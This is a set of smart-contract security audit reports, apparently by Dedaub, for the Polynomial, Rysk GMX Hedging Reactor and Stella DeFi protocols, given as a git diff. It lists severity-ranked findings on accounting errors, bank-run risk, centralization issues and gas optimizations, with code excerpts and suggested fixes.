successfully executed or has been canceled. In case the order has been canceled, the opposite exchange order is closed and the KangarooVault position data are adjusted to how they were before opening the order. However, the margin transferred to the Synthetix Perpetual Market, which was required for the position, is not revoked, meaning that the KangarooVault funds are not optimally managed. At the same time, when a pending close order's execution is confirmed in the function _clearPendingCloseOrders, the margin deposited to the Synthetix Perpetual Market is not reduced accordingly, except when positionData.shortAmount == 0. The KangarooVault funds could also be suboptimally managed because the function KangarooVault::_openPosition does not take into account the already available margin when calculating the margin needed for a new open order. If the already opened position has available margin, the KangarooVault could use part of that for its new order and transfer less than what would be needed if there was no margin available. +M3 LiquidityPool and KangarooVault could be susceptible to bank runs OPEN The LiquidityPool and KangarooVault contracts could be susceptible to bank runs. As these two contracts can use up to their whole available balance, liquidity providers might rush to withdraw their deposits when they feel that they might not be able to withdraw for some time. At the same time, depositors would rush to withdraw if they realized that the pool's Synthetix position is in danger and their funds that have been deposited as margin could get lost. A buffer of funds that are always available for withdrawal could increase the trust of liquidity providers in the system. Also, an emergency fund, which is built from fees and could help alleviate fund losses, could also help make the system more robust against bank run scenarios.
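A minimal sketch of the liquidator-specified minimum suggested in M1. The minCollateralOut parameter is a hypothetical addition:

function liquidate(
    uint256 positionId,
    uint256 debt,
    uint256 minCollateralOut // hypothetical slippage bound
) external nonReentrant {
    uint256 totalCollateralReturned = _liquidate(positionId, debt);
    // Revert instead of silently paying out less than the liquidator
    // is willing to accept.
    require(totalCollateralReturned >= minCollateralOut, "INSUFFICIENT_COLLATERAL_OUT");
}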
+M4 Casual users might be more vulnerable in a bank run OPEN In a bank run situation casual users of the LiquidityPool (i.e., users that interact with it through the web UI) might not be able to withdraw their funds. This is because the LiquidityPool offers different withdrawal functionality for different users. Power users (or protocols that integrate with the LiquidityPool) are expected to use the withdraw function, which offers immediate withdrawals for a small fee, while casual users that use the web UI will use the queueWithdraw function, which queues the withdrawal so it can be processed at a later time. +M5 Unsafe ERC20 transfer in LiquidityPool::withdraw OPEN Function LiquidityPool::withdraw uses a plain ERC20 transfer without checking the returned value, which is an unsafe practice. It is recommended to always either use OpenZeppelin's SafeERC20 library or at least to wrap each operation in a require statement. +M6 Wrong withdrawal calculations in KangarooVault OPEN Function processWithdrawalQueue processes the KangarooVault's queued withdrawals. It first checks if the available funds are sufficient to cover the withdrawal. If not, a partial withdrawal is made and the records are updated to reflect that. The QueuedWithdraw.returnedAmount field holds the value that has been returned to the user thus far. However, it doesn't correctly account for partial withdrawals, as the partial amount is assigned to the variable instead of being added to it. KangarooVault::processWithdrawalQueue() function processWithdrawalQueue( uint256 idCount ) external nonReentrant { for (uint256 i = 0; i < idCount; i++) { // Dedaub: Code omitted for brevity // Partial withdrawals if not enough available funds in the vault // Queue head is not increased if (susdToReturn > availableFunds) { // Dedaub: The withdrawn amounts should be accumulated in // returnedAmount instead of being directly assigned current.returnedAmount = availableFunds; ... } else { // Dedaub: Although this branch is for full withdrawals, there // may have been partial withdrawals before, so the accounting // should also be cumulative here current.returnedAmount = susdToReturn; ... } queuedWithdrawalHead++; } } +M7 LiquidityPool's exposure calculation may be inaccurate OPEN The Synthetix Perpetual Market has a two-step process for increasing/decreasing positions, in which a request is submitted and remains in a pending state until it is executed by a keeper. LiquidityPool::_getExposure does not consider the queued Synthetix Perp position tracked by the queuedPerpSize storage variable, meaning that LiquidityPool::getExposure will return an inaccurate value when called between the submission and the execution of an order. LiquidityPool::_getExposure() function _getExposure() internal view returns (int256 exposure) { // Dedaub: queuedPerpSize should be considered in currentPosition int256 currentPosition = _getTotalPerpPosition(); exposure = _calculateExposure(currentPosition); } LiquidityPool::rebalanceMargin does not consider queuedPerpSize either. The Polynomial team has mentioned that they plan to always call placeQueuedOrder before calling rebalanceMargin, thus adding a requirement that queuedPerpSize is equal to 0 would be enough to enforce that prerequisite. M8 LiquidityPool::_hedge always adds margin to Synthetix OPEN The function LiquidityPool::_hedge is responsible for hedging every position opened against the LiquidityPool by opening the opposite position in the Synthetix Perp Market.
In doing so, _hedge transfers an amount of funds to the Synthetix Perp Market to be used as margin for the position. However, margin does not always need to be increased; e.g., it does not need to be increased when the Synthetix Perp position is decreased because the LiquidityPool is hedging a long position and thus goes short. When the absolute position size of the LiquidityPool in the Synthetix Perp Market is decreased, the LiquidityPool could remove the unnecessary margin or abstain from increasing it, to account for the rare case where a Synthetix order is not executed. This, together with frequent calls to the rebalanceMargin function, would help improve the capital efficiency of the LiquidityPool. LOW SEVERITY: ID Description STATUS +L1 Computations that use invalid values could be avoided OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price, which could be invalid in some cases. Even if the base asset price provided is invalid, a tuple (value, true) is returned, where value is the value computed based on the invalid base asset price. However, if the base asset price is invalid, the tuple (0, true) could be returned while the whole computation is skipped, to save gas unnecessarily spent on computing an invalid value. +L2 A critical requirement is enforced by dependency code OPEN Function Exchange::_openTrade, when called with params.isLong set to false and params.positionId different from 0, does not check that the msg.sender is the owner of the params.positionId short token position. This necessary requirement is later checked when ShortToken::adjustPosition is called. Nevertheless, we would recommend adding the appropriate require statement also as part of the function _openTrade, as it is the one querying the position (a sketch follows after issue L4 below). This would also add an extra safeguard against a future code change that accidentally removes the already existing require statement. +L3 A critical requirement is enforced by the ERC20 code OPEN In function LiquidityPool::closeLong, as in openShort, there is an outgoing flow of funds. However, there does not exist a require statement on the existence of the needed funds, as in the openShort function. Of course, if there are not enough funds to be transferred out of the LiquidityPool contract, the ERC20 transfer code will cause a revert. Still, requiring that usedFunds<=0 || totalFunds>=uint256(usedFunds) makes the code more failproof. The same could be applied to function rebalanceMargin, where there is an outgoing flow of funds towards the Synthetix Perp Market. +L4 A critical requirement is enforced by callee code OPEN Function ShortCollateral::collectCollateral does not require that the provided collateral is approved (and matches the collateral of the already opened position). This could be problematic, i.e., a non-approved worthless collateral could be deposited instead, if every call to collectCollateral were not coupled with a call to getMinCollateral, which enforces the aforementioned requirement. Implementing these requirements would constitute a step towards a more defensive approach, one that would make the system more bulletproof and robust even if the codebase continues to evolve and become more complicated.
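A minimal sketch of the extra safeguard suggested in L2. The exact owner accessor on the short token contract is an assumption for illustration:

// Inside Exchange::_openTrade, before adjusting an existing position
// (params.isLong == false && params.positionId != 0):
require(
    shortToken.ownerOf(params.positionId) == msg.sender,
    "NOT_POSITION_OWNER"
);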
+L5 Collateral approvals cannot be revoked OPEN The ShortCollateral contract does not implement any functionality to revoke collateral approvals, meaning that the contract owner cannot undo even an incorrect approval and would need to redeploy the contract if that were to happen. Implementing such functionality would require a lot of care to ensure no funds (collateral) are trapped in the system, i.e., cannot be withdrawn, due to the collateral approval being revoked and the withdrawal functionality being operational only for approved collaterals. +L6 No events are emitted for several interactions OPEN In LiquidityPool::processWithdrawals there is no event emitted when a withdrawal is attempted but there are 0 funds available to be withdrawn. In LiquidityPool::setFeeReceipient there is no event emitted even though a relevant event is declared in the contract (event UpdateFeeReceipient). In LiquidityPool::executePerpOrders there is no event emitted when the admin executes an order. In KangarooVault::executePerpOrders there is no event emitted when the admin executes an order. In KangarooVault::receive there is no event emitted when the contract receives ETH, in contrast to the LiquidityPool, which emits an event for this. +L7 Lack of minimum deposit and withdraw amount checks allows users to spam the queues with small requests OPEN In LiquidityPool, users can request to deposit or withdraw any amount of tokens by calling the queueDeposit and queueWithdraw functions. Although there are checks in place to avoid registering zero-amount requests, there are no checks to ensure that someone cannot spam the queue with requests for infinitesimal amounts. LiquidityPool::queueDeposit() function queueDeposit(uint256 amount, address user) external override nonReentrant whenNotPaused("POOL_QUEUE_DEPOSIT") { require(amount > 0, "Amount must be greater than 0"); // Dedaub: Add a minDepositAmount check QueuedDeposit storage newDeposit = depositQueue[nextQueuedDepositId]; ... } LiquidityPool::queueWithdraw() function queueWithdraw(uint256 tokens, address user) external override nonReentrant whenNotPaused("POOL_QUEUE_WITHDRAW") { require(liquidityToken.balanceOf(msg.sender) >= tokens && tokens > 0); // Dedaub: Add a minWithdrawAmount check QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... } Even though there is no clear financial incentive for someone to do this, an incentive would be to disrupt the normal flow of the protocol, and to annoy regular users, who would have to spend more gas until their requests were processed. However, the functions that process the queues can be called by anyone, including the admin, and users can also bypass the queues by directly depositing or withdrawing their tokens for a fee. KangarooVault suffers from the same issue for withdrawals. For deposits, a minDepositAmount variable is defined and checked each time a new deposit call is made. KangarooVault::initiateDeposit() function initiateDeposit( address user, uint256 amount ) external nonReentrant { require(user != address(0x0)); require(amount >= minDepositAmount); ... } KangarooVault::initiateWithdrawal() function initiateWithdrawal( address user, uint256 tokens ) external nonReentrant { require(user != address(0x0)); if (positionData.positionId == 0) { ... } else { require(tokens > 0, "Tokens must be greater than 0"); // Dedaub: Add a minWithdrawAmount check here QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ...
} VAULT_TOKEN.burn(msg.sender, tokens); } +L8 LiquidityPool's deposit and withdraw arguments are not validated OPEN LiquidityPool's deposit and withdraw functions do not require that the specified user, which will receive the tokens, is different from address(0). The caller of the aforementioned functions might not set the parameter correctly, or might make the incorrect assumption that by setting it to address(0) it will default to msg.sender, leading to the tokens being sent to the wrong address. At the same time, the deposited/withdrawn amount is not required to be greater than 0. +L9 VaultToken::setVault can be front-run OPEN The VaultToken contract declares the setVault function to solve the dual dependency problem between VaultToken and KangarooVault, as both require each other's address for their initialisation. However, this function can be called by anyone, whereas the vault address can only be set once. As a result, we raise a warning here to emphasize that the VaultToken contract needs to be correctly initialized, as otherwise the call could be front-run or repeated (in case the initialization performed by the protocol team fails for some reason and the uninitialized variable remains unnoticed) to initialize the vault storage variable with a malicious Vault address. L10 LiquidityPool::closeShort should use mulWadUp too OPEN The closeShort function of the LiquidityPool contract has the same logic as openLong. openLong passes the rounding error cost to the user by using mulWadUp for the tradeCost calculation. However, closeShort does not adopt this behavior and uses mulWadDown for the same calculation. We recommend changing this to be the same as openLong. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ID Description STATUS +N1 LiquidityPool's and KangarooVault's admin can control the leverage and margin of the position OPEN In LiquidityPool, the admin has increased power over its position leverage and the margin that is deposited to or withdrawn from the Synthetix Perp Market. More specifically: First of all, the admin can arbitrarily set the leverage through the LiquidityPool's updateLeverage function. Essentially, the risk of the LiquidityPool can be arbitrarily increased. LiquidityPool::updateLeverage() function updateLeverage(uint256 _leverage) external requiresAuth { require(_leverage >= 1e18); emit UpdateLeverage(futuresLeverage, _leverage); futuresLeverage = _leverage; } LiquidityPool::_calculateMargin() function _calculateMargin( int256 size ) internal view returns (uint256 margin) { (uint256 spotPrice, bool isInvalid) = baseAssetPrice(); require(!isInvalid && spotPrice > 0); uint256 absSize = size.abs(); margin = absSize.mulDivDown(spotPrice, futuresLeverage); } The admin is also responsible for managing the margin of the pool's Synthetix Perp position. Via the LiquidityPool::increaseMargin function, the admin can use up to the whole available balance of the pool. The logic that decides when the aforementioned function is called is off-chain.
LiquidityPool::increaseMargin() function increaseMargin( uint256 additionalMargin ) external requiresAuth nonReentrant { perpMarket.transferMargin(int256(additionalMargin)); usedFunds += int256(additionalMargin); require(usedFunds <= 0 || totalFunds >= uint256(usedFunds)); emit IncreaseMargin(additionalMargin); } Additionally, the LiquidityPool::rebalanceMargin function can be used to increase or decrease the pool's margin inside the limits set by the pool's leverage and the margin limits set by Synthetix. Again the logic that decides the marginDelta parameter and calls rebalanceMargin is off-chain. The KangarooVault suffers from similar centralization issues. Nevertheless, the function setLeverage of the KangarooVault does not allow the admin to set the leverage to more than 5x. N2 LiquidityPool admin can drain all deposited funds by being able to arbitrarily set the fee percentages OPEN In LiquidityPool, there are several functions that only the admin can control and allow him to parameterise all fee variables, such as deposit and withdrawal fees. However, there are no limits imposed on the values set for these variables. LiquidityPool::setFees() function setFees( uint256 _depositFee, uint256 _withdrawalFee ) external requiresAuth { ... // Dedaub: We recommend adding checks for depositFee and withdrawalFee // to prevent unrestricted fee rates depositFee = _depositFee; withdrawalFee = _withdrawalFee; } This means that the admin could change the deposit/withdrawal fee and have all the newly deposited/withdrawn funds moved to the feeRecipient address. Apart from the obvious centralisation issue, such checks could prevent huge losses in the event of a compromise of the admin account or the protocol itself. On the other hand, such checks have been used in the KangarooVault and thus we strongly recommend adding them to LiquidityPool as well. KangarooVault::setFees() function setFees( uint256 _performanceFee, uint256 _withdrawalFee ) external requiresAuth { require(_performanceFee <= 1e17 && _withdrawalFee <= 1e16); ... performanceFee = _performanceFee; withdrawalFee = _withdrawalFee; } The same applies for the following functions that also need limits on the possible values that can be set by the admin: LiquidityPool::updateLeverage() (see also N1 for an example) LiquidityPool::updateStandardSize() LiquidityPool::setBaseTradingFee() LiquidityPool::setDevFee() LiquidityPool::setMaxSlippageFee() OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ID Description STATUS +A1 Extra requirements can be added INFO Functions _addCollateral and _removeCollateral of the Exchange contract do not require that amount > 0. Function _liquidate does not require that debtRepaying > 0. +A2 ShortCollateral::approveCollateral does not check if the collateral is already approved INFO Function ShortCollateral::approveCollateral does not require that collateral.isApproved == false to disallow approving the same collateral more than once. +A3 LiquidityPool::hedgePositions can return early in some cases INFO In LiquidityPool::hedgePositions there is no handling of the case where newPosition is equal to 0 and the execution can return early. +A4 No pause logic used in KangarooVault INFO Core contracts of the protocol such as LiquidityPool and Exchange inherit the PauseModifier and use separate pause logic on several functions.
In contrast, KangarooVault, which has an implemented logic similar to LiquidityPool, inherits the PauseModifier but does not use the whenNotPaused modifier on any function. +A5 Functions' logic can be optimized to save gas INFO In the functions LiquidityPool::processWithdraws and KangarooVault::processWithdrawalQueue, the LP token price is calculated in every iteration of the loop that processes withdrawals when in fact it does not change. Thus, the computation could be performed once, before the loop, to save gas. +A6 Unnecessary calls to LiquidityPool from KangarooVault INFO The functions removeCollateral and _openPosition of the KangarooVault contract call LiquidityPool::getMarkPrice to get the mark price. However, this function only calls Exchange::getMarkPrice without adding any extra functionality. Therefore, we recommend making a direct call to Exchange::getMarkPrice from KangarooVault instead, to save some gas. +A7 Functions could be made external INFO The following functions could be made external instead of public, as they are not called by any of the contract functions: Exchange.sol refresh orderFee LiquidityPool.sol LiquidityToken.sol PowerPerp.sol ShortToken.sol refresh ShortCollateral.sol SynthetixAdapter.sol refresh getMinCollateral canLiquidate maxLiquidatableDebt getSynth getCurrencyKey getAssetPrice getAssetPrice SystemManager.sol init setStatusFunction +A8 Redundant overrides INFO All function and storage variable overrides in the Exchange, LiquidityPool, ShortCollateral and SynthetixAdapter contracts are redundant and can be removed. +A9 Unused storage variables INFO There is a number of storage variables that are not used: Exchange:SUSD KangarooVault:maxDepositAmount LiquidityPool:addressResolver +A10 Storage variables can be made immutable INFO The following storage variables can be made immutable: SystemManager.sol SynthetixAdapter.sol addressResolver futuresMarketManager synthetix exchangeRates +A11 LiquidityPool::liquidate is not used INFO The function liquidate of the LiquidityPool contract is not called by the Exchange, which is the only contract that would be able to call it. At the same time, this means that the LiquidityPool::_hedge function is always called with its second argument set to false. Furthermore, if this function is maintained for future use, we raise a warning here that hedgingFees are accounted for twice: once by LiquidityPool::_hedge and once directly inside the liquidate function (a sketch of the fix follows after issue A14 below). LiquidityPool::liquidate() function liquidate( uint256 amount ) external override onlyExchange nonReentrant { ... uint256 hedgingFees = _hedge(int256(amount), true); // Dedaub: hedgingFees are double counted here usedFunds += int256(hedgingFees); emit Liquidate(markPrice, amount); } +A12 Incorrect code comment INFO The code comment of KangarooVault::saveToken mentions "Save ERC20 token from the vault (not SUSD or UNDERLYING)" when there is no notion of an UNDERLYING token. +A13 Typo in the use of the word recipient INFO In LiquidityPool, KangarooVault and ILiquidityPool, all appearances of the word recipient contain a typo and are written as receipient. For example, the fee recipient storage variable is written as feeReceipient instead of feeRecipient. +A14 Code duplication INFO The functions canLiquidate and maxLiquidatableDebt of ShortCollateral.sol share a large proportion of their code. For readability this part could be included in a separate method.
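If LiquidityPool::liquidate is kept for future use, a minimal sketch of removing the double count flagged in A11, relying on the fact (noted in H5) that _hedge already adds hedgingFees to usedFunds internally:

function liquidate(uint256 amount) external override onlyExchange nonReentrant {
    ...
    // _hedge already accounts for hedgingFees in usedFunds, so no
    // further increment is performed here.
    _hedge(int256(amount), true);
    emit Liquidate(markPrice, amount);
}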
+A15 A large liquidation bonus percentage could lead to a decrease, instead of the expected increase, of the collateral ratio INFO A liquidation of a part of an underwater position is expected to increase its collateralization ratio. In a partial liquidation, the liquidator deletes part of the position and gets collateral of the same value, but also some extra collateral as a liquidation bonus. If the liquidation bonus percentage is large, the collateral ratio after the liquidation could be lower compared to the one before. The parameters of the protocol should be chosen carefully to avoid this problem. For example: WIPEOUT_CUTOFF * coll.liqRatio > 1 + coll.liqBonus +A16 No check that normalizationUpdate is positive INFO The functions getMarkPrice and updateFundingRate of the Exchange contract compute the normalizationUpdate variable using the formula: int256 totalFunding = wadMul(fundingRate, (currentTimeStamp - fundingLastUpdatedTimestamp)); int256 normalizationUpdate = 1e18 - totalFunding; Although the fundingRate is bounded (it takes values between -maxFunding and maxFunding), the difference currentTimeStamp - fundingLastUpdatedTimestamp is not, therefore totalFunding can in principle have an arbitrarily large value, especially a value greater than 1e18 (using 18 decimals precision). The result would be a negative normalizationUpdate and a negative mark price, which would mess up all the computations of the protocol. A check that normalizationUpdate is positive could be added. Nevertheless, since the value of maxFunding is 1e16, the protocol would have to be inactive for at least 100 days before this issue occurs. A17 Compiler version and possible bugs INFO The code can be compiled with Solidity 0.8.9 or higher. For deployment, we recommend no floating pragmas, but a specific version, to be confident about the baseline guarantees offered by the compiler. Version 0.8.9, in particular, has some known bugs, which we do not believe affect the correctness of the contracts. diff --git a/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt b/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt new file mode 100644 index 0000000..6649953 --- /dev/null +++ b/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt @@ -0,0 +1,12 @@ +M1 GmxPositionRouter has unlimited spending approval RESOLVED In the GmxHedgingReactor constructor the gmxPositionRouter is approved to spend an infinite amount of _collateralAsset. This appears to be unneeded and potentially dangerous, as the transfer of _collateralAsset is actually handled by the GMX router, which gets approved for the exact amount needed in the function _increasePosition, and not by the gmxPositionRouter. +M2 Inconsistent returns in _changePosition RESOLVED The function GmxHedgingReactor::_changePosition is not consistent with the values it returns. Even though it should always return the resulting difference in delta exposure, it does not do so at the end of the if-branch of the if (_amount > 0) { } statement. If the control flow reaches that point, it jumps to the end of the function, leading to 0 being returned, i.e., as if there was no change in delta. function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. // Dedaub: last statement is not a return increaseOrderDeltaChange[positionKey] += deltaChange; } else { // ..
return deltaChange + closedPositionDeltaChange; } return 0; } We would suggest the following fixes: function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. return deltaChange + closedPositionDeltaChange; } else if (_amount < 0) { // .. return deltaChange + closedPositionDeltaChange; } return 0; } Currently the return value of _changePosition is further returned by the function hedgeDelta and remains unused by its callers. However, this could change in future versions of the protocol, leading to bugs. +M3 GMX long and short positions could co-exist RESOLVED GMX treats longs and shorts as completely separate positions, and charges borrowing fees on both simultaneously, thus the reactor deals with positions in such a way that ensures only a single position is open at a certain time. Nevertheless, due to the two-step process that GMX uses to create positions and the fact that the reactor does not take into account that a new position might be created while another one is waiting to be finalized, there exists a scenario in which the reactor could end up with a long and a short position at the same time. The scenario is the following: 1. Initially, there are no open positions. 2. A long or short position is opened on GMX but is not executed immediately, i.e., GmxHedgingReactor::gmxPositionCallback is not called. The LiquidityPool reckons that a counter position should be opened and calls GmxHedgingReactor::hedgeDelta to do so. 3. When the two position orders are finally executed by GMX, the reactor will have a long and a short position open simultaneously. The above scenario might not be likely to happen, as it requires the LiquidityPool to open two opposite positions in a very short period of time, i.e., before the first position order is executed by a GMX keeper or a keeper of the protocol. Nevertheless, we believe it would be better to also handle such a scenario, as it could mess up the reactor's accounting and the fix should be relatively easy. +M4 _getCollateralSizeDeltaUsd() in some cases underestimates the extra collateral needed for an increase of a position ACKNOWLEDGED Whenever the hedging reactor asks for an increase of a position, _getCollateralSizeDeltaUsd() computes the extra collateral needed using collateralToTransfer (collateral needed to be added or removed from the position before its increase, to maintain the health at the desired value) and extraPositionCollateral (the extra collateral needed for the increase of the position). If isAboveMax==true and extraPositionCollateral > collateralToTransfer, then the collateral which is actually added is just totalCollateralToAdd = extraPositionCollateral - collateralToTransfer, which could be insufficient to collateralize the increased position. Let us try to explain this with an example. Suppose that initially there is a long position with position[0]=10_000, position[1]=5_000. The hedging reactor then asks for an increase of its position by 11_000. extraPositionCollateral will be 5_500. Suppose that in the meantime this position had substantial profits, i.e., positive unrealised pnl=5_000. collateralToTransfer will be 5_000 and totalCollateralToAdd will be 5_500-5_000=500. Therefore the "leverage without pnl" of the new position will be (10_000+11_000)/(5_000+500)=21_000/5_500=3.8. If this scenario is repeated, it could lead to the liquidation of the position.
We suggest adding a check that the total size of the position does not exceed its total collateral times maxLeverage, similar to the one used in the case of decreasing a position. LOW SEVERITY: ID Description STATUS +L1 setPositionRouter does not remove the old PositionRouter RESOLVED The function GmxHedgingReactor::setPositionRouter sets gmxPositionRouter to the new GMX PositionRouter contract that is provided and calls approvePlugin on the GMX Router contract to approve it. It does not revoke the approval of the old PositionRouter contract, which from now on is irrelevant to the reactor, by calling the function denyPlugin of the GMX Router contract. L2 Potential underflow in checkVaultHealth RESOLVED If a position is in loss, the formula of the health variable is the following one: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():344 health=(uint256((int256(position[1])-int256(position[8])).div(int256(position[0]))) * MAX_BIPS) / 1e18; There is no check if the difference (int256(position[1])-int256(position[8])) in the above formula is positive or not. It is possible, under specific economic conditions (and if the GMX liquidators are not fast enough), that the result of this difference is negative. In such a case, the resulting value will be erroneous because of an underflow error. Even if this scenario is not expected to happen on a regular basis, we suggest adding a check that this difference is indeed positive, and if it is not, extra measures should be taken to avoid liquidations. Note that the same issue appears in getPoolDenominatedValue, leading to the execution reverting if an underflow occurs. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ID Description STATUS +A1 getPoolDenominatedValue() wastes gas INFO The function GmxHedgingReactor::getPoolDenominatedValue wastes gas by calling the function checkVaultHealth to retrieve just the currently open GMX position instead of directly calling the _getPosition function. +A2 gmxPositionCallback() can be made more gas efficient INFO The function GmxHedgingReactor::gmxPositionCallback is responsible for updating the internalDelta of the reactor with the values that are stored in the mappings increaseOrderDeltaChange and decreaseOrderDeltaChange. These mappings are essentially used as temporary storage before the change in delta is applied to the internalDelta storage variable. Thus, after a successful update the associated mapping element should be deleted to receive a gas refund for freeing up space on the blockchain. +A3 sync() can be made more gas efficient INFO The function GmxHedgingReactor::sync is implemented to consider the scenario where a long and a short position are open on GMX at the same time. function sync() external returns (int256) { _isKeeper(); uint256[] memory longPosition = _getPosition(true); uint256[] memory shortPosition = _getPosition(false); uint256 longDelta = longPosition[0] > 0 ?
(longPosition[0]).div(longPosition[2]) : 0; uint256 shortDelta = shortPosition[0] > 0 ? (shortPosition[0]).div(shortPosition[2]) : 0; internalDelta = int256(longDelta) - int256(shortDelta); return internalDelta; } However, the reactor as a whole is implemented in a way that ensures that a long and a short position cannot co-exist. Thus, the sync function can be implemented to take into account only the current open position, making it more efficient in terms of gas usage. +A4 Duplicate computations INFO In GmxHedgingReactor::_getCollateralSizeDeltaUsd there is the following code: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():670 if ( int256(position[1] / 1e12) - int256(adjustedCollateralToRemove) < int256(((position[0] - _getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000)) ) { adjustedCollateralToRemove = position[1] / 1e12 - ((position[0]-_getPositionSizeDeltaUsd(_amount,position[0])) / 1e12) / (vault.maxLeverage() / 11000); if (adjustedCollateralToRemove == 0) { return 0; } } Observe that the quantity ((position[0]-_getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000) is computed twice, which can be avoided by computing it once and storing its value in a local variable. The same is true for the quantity _amount.mul(position[2] / 1e12).div(position[0] / 1e12) that appears twice in the following computation: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():651 collateralToRemove = (1e18 - ( (int256(position[0]/1e12)+int256((leverageFactor.mul(position[8]))/1e12)) .mul(1e18-int256(_amount.mul(position[2]/1e12).div(position[0]/1e12))) .div(int256(leverageFactor.mul(position[1])/1e12)) )).mul(int256(position[1]/1e12)) - int256(_amount.mul(position[2]/1e12).div(position[0]/1e12) .mul(position[8]/1e12)); The above computation can be simplified even further by applying specific mathematical properties: uint256 d = _amount.mul(position[2]).div(position[0]); collateralToRemove = (int256(position[1] / 1e12) - ( ((int256(position[0]) + int256(leverageFactor.mul(position[8]))) / 1e12) .mul(1e18 - int256(d)).div(int256(leverageFactor)) )) - int256(d.mul(position[8] / 1e12)); +A5 Duplicate calls INFO The functions _increasePosition and _decreasePosition of the reactor unnecessarily call gmxPositionRouter's minExecutionFee function twice each, instead of caching the returned value in a local variable after the first call (a sketch follows below). +A6 Incorrect comment in _increasePosition INFO The comment describing the parameter _collateralSize of the function _increasePosition should read "amount of collateral to add" instead of "amount of collateral to remove". +A7 Unused errors INFO The following errors are defined but not used: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():88 error ValueFailure(); error IncorrectCollateral(); error IncorrectDeltaChange(); error InvalidTransactionNotEnoughMargin(int256 accountMarketValue, int256 totalRequiredMargin); A8 Compiler bugs INFO The code is compiled with Solidity 0.8.9, which, at the time of writing, has some known bugs, which we do not believe to affect the correctness of the contracts.
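A minimal sketch of the caching suggested in A5 (illustrative; the local variable name is assumed):

// Cache the fee instead of calling the router twice.
uint256 executionFee = gmxPositionRouter.minExecutionFee();
// ... use executionFee in both places that previously called
// gmxPositionRouter.minExecutionFee() ...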
diff --git a/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt b/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt new file mode 100644 index 0000000..2fbcf43 --- /dev/null +++ b/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt @@ -0,0 +1,9 @@ +L1 Liquidation status depends heavily on off-chain code ACKNOWLEDGED Function BaseStrategy::liquidatePosition defines the condition that must be satisfied in order for a position to be considered liquidatable: BaseStrategy::liquidatePosition():L349-356 if ( pos.status != PositionStatus.ACTIVE || (debtRatioE18 < ONE_E18 && pos.startLiqTimestamp == 0 && pos.positionDeadline > block.timestamp) ) { revert PositionNotLiquidatable( _params.posOwner, _params.posId, pos.status ); } As one can observe, if liquidatePosition is called and it is true that debtRatioE18 < ONE_E18 but at the same time it holds that pos.startLiqTimestamp != 0, the position can get liquidated. How could this happen: 1. debtRatioE18 goes over 100% (ONE_E18). 2. The position is marked liquidatable, i.e., pos.startLiqTimestamp is set to a value different from 0. 3. debtRatioE18 goes below ONE_E18 before the position gets liquidated, due to the user adding extra collateral or due to the value of borrowed/collateral assets changing. At this point the position can get liquidated even though it is above water. At the same time, pos.startLiqTimestamp can only be set via BasePositionManager::markLiquidationStatus, a function which is intended mainly for position monitoring and liquidation bots to call. Thus, the marking and unmarking of positions depends heavily on off-chain code, meaning that there is always a chance that a previously unhealthy position, which becomes healthy, might not be marked as such and might get liquidated unfairly. As a general security practice, we recommend avoiding the dependence on off-chain logic as much as possible. Ideally, even in an extreme scenario in which all monitoring bots are down for a prolonged period of time, the effects on the protocol should not be unlimited. In the case of liquidatePosition, an extreme downtime scenario could lead to liquidating a position with an arbitrarily low debt ratio if it remains marked. This could be avoided by checking inside the function whether the conditions for unmarking the position are satisfied, namely that the debt ratio is below unmarkLiqDebtRatioE18. The Stella team acknowledged the issue. Unfortunately, the use of bots for marking/unmarking positions is unavoidable. Also, the team would like to prevent the case where prices fluctuate around the 100% debt ratio, which can cause bots to mark and unmark too many times. That is why there is a different threshold, unmarkLiqDebtRatioE18, for the marking and unmarking. Our final suggestion was to extend the liquidation condition by not allowing the liquidation of positions whose debt ratio is below unmarkLiqDebtRatioE18. L2 Sequencer downtime can cause large liquidation discount OPEN The time-based liquidation discount mechanism offers a 1% discount for each minute a position remains liquidatable. So if a liquidatable position has not been liquidated for 20 minutes, it will have a 20% discount (with a cap at 30%, that is, 30 minutes). In contrast to issue L1, this mechanism does not rely on running our own bot, since anyone has an incentive to liquidate a position. Still, the discount logic does interpret the fact that liquidation did not happen within 20 minutes as a lack of incentive, requiring the price to be lowered.
